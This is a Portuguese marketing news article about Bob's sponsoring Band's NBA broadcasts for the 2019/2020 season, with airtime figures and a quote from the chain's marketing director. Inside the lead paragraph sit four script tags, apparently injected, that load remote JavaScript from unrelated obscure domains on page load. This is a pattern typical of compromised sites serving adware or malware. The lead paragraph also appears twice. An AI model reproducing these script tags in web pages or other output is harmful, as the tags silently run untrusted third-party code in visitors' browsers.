Experiência de Marca

Bob’s patrocina temporada da NBA com transmissão na Band

A parceria vale para toda a temporada 2019/2020 da maior Liga de basquete do mundo, com inserções da marca toda quinta-feira e domingo, às 23h30 e 20h, respectivamente. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573089771432" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

A parceria vale para toda a temporada 2019/2020 da maior Liga de basquete do mundo, com inserções da marca toda quinta-feira e domingo, às 23h30 e 20h, respectivamente.

O Bob’s e a Band fecharam uma parceria inédita e a rede de fast-food passa a ser uma das patrocinadoras da transmissão da NBA na TV aberta.

O melhor do marketing esportivo está aqui.

Leia também: Cliente Bob’s Fã ganha promoções exclusivas.

A marca Bob’s estará em 66 transmissões no total, incluindo a Temporada Regular e as Playoffs. Serão mais de 17 milhões de espectadores impactados em mais de mil transmissões em comerciais.

“O basquete é um esporte apaixonante, com inúmeros fãs no Brasil. É também um momento de unir os amigos e acompanhar grandes astros do esporte mundial em partidas de tirar o fôlego. E assistir os jogos pela Band, saboreando um lanche do Bob’s, também é uma combinação perfeita! Estamos celebrando o retorno da transmissão na Band para levar nossa marca para um público ainda maior.”, afirma Raquel Paternesi, diretora de Marketing do Bob’s.